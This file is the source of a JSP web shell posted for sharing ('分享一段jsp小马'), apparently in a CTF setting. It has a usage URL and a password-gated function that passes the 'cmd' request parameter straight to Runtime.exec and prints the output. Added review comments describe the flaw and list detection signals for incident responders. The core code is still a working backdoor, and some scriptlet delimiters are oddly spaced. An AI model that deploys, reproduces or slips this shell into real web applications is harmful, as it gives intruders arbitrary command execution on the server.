<% @ page language = "java" import = "java.util.*,java.io.*" pageEncoding = "UTF-8"%>
< % !public static String excuteCmd(String c)
{
// Runs the string c as an operating-system command on the server and returns
// the text the process wrote to standard output, or the exception message if
// anything in the try block throws.
//
// NOTE(review): c reaches Runtime.exec() with no allow-list, validation or
// argument separation, so whoever controls c decides what the servlet
// container's account executes. The scriptlet further down this page passes
// the `cmd` request parameter straight in, which makes the page a web shell.
// A JSP in a web root that pairs Runtime.getRuntime().exec with request input
// should be handled as an indicator of compromise, not as application code.
//
// Detection notes for defenders: the application server's JVM spawning child
// processes, and unexpected .jsp files appearing under the deployed web root,
// are the host-side signals this code produces.
StringBuilder line = new StringBuilder();
try
{
// Command execution sink: the caller-supplied string is run as-is.
Process pro = Runtime.getRuntime().exec(c);
// Only the child's standard output is read; the error stream is not consumed.
BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;
while ((temp = buf.readLine()) != null)
{
line.append(temp + "\\n");
}buf.close();
}
catch (Exception e)
{
// Any failure is folded into the returned text, so the exception message is
// disclosed to whoever made the request.
line.append(e.getMessage());
}
return line.toString();
}% >
< %
// Request handler for the page: when the `pwd` parameter equals the constant
// "023" and `cmd` is not the empty string (a missing `cmd` also passes that
// test), the value of `cmd` is handed to excuteCmd and the result is written
// into the response. Every other request receives ":-)".
//
// NOTE(review): a constant compared in page source is not authentication; it
// is readable by anyone who obtains the file and, when sent in the query
// string, is recorded in access and proxy logs together with `cmd`. Those log
// entries (requests to an unfamiliar .jsp carrying `pwd` and `cmd` parameters)
// are a practical hunting lead during incident response.
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd")))
{
// Command output is concatenated into the HTML response without encoding.
out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
}
else {
out.println(":-)");
}
% >
利用http://127.0.0.1/chendi17.jsp?&pwd=023&cmd=cat%20flag.txt
分享一段jsp小马